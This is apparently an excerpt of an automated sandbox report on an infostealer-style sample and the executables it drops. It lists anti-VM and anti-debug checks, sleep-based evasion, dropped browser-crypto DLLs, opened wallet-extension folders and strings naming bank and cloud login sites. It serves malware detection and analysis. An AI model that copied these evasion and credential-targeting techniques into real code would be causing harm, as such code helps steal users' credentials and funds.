Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 5326C7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 597A4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Code function: 7_2_05170DC5 rdtsc 7_2_05170DC5
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Window / User API: threadDelayed 929
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1964
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3419
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 407
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe TID: 6848 Thread sleep count: 929 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7476 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7476 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7480 Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7480 Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7440 Thread sleep count: 407 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7440 Thread sleep time: -12210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7460 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7460 Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7468 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7556 Thread sleep time: -720000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7464 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7464 Thread sleep time: -68034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7440 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe TID: 7624 Thread sleep count: 52 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C55C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: BGIIDAEB.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: BGIIDAEB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BGIIDAEB.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000C.00000002.3235833940.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: 528307a0ac.exe, 0000000D.00000002.2717126137.0000000001898000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW85
Source: BGIIDAEB.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: 528307a0ac.exe, 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarel
Source: BGIIDAEB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BGIIDAEB.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BGIIDAEB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BGIIDAEB.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BGIIDAEB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BGIIDAEB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000093C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.00000000008BC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: BGIIDAEB.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BGIIDAEB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000093C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.00000000008BC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: explorti.exe, 0000000C.00000002.3236691594.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000093C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.00000000008BC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: IDGHDGIDAK.exe, 00000007.00000002.2240671621.0000000000C98000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000009.00000002.2275569410.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000A.00000002.2283494834.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.3235833940.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: BGIIDAEB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
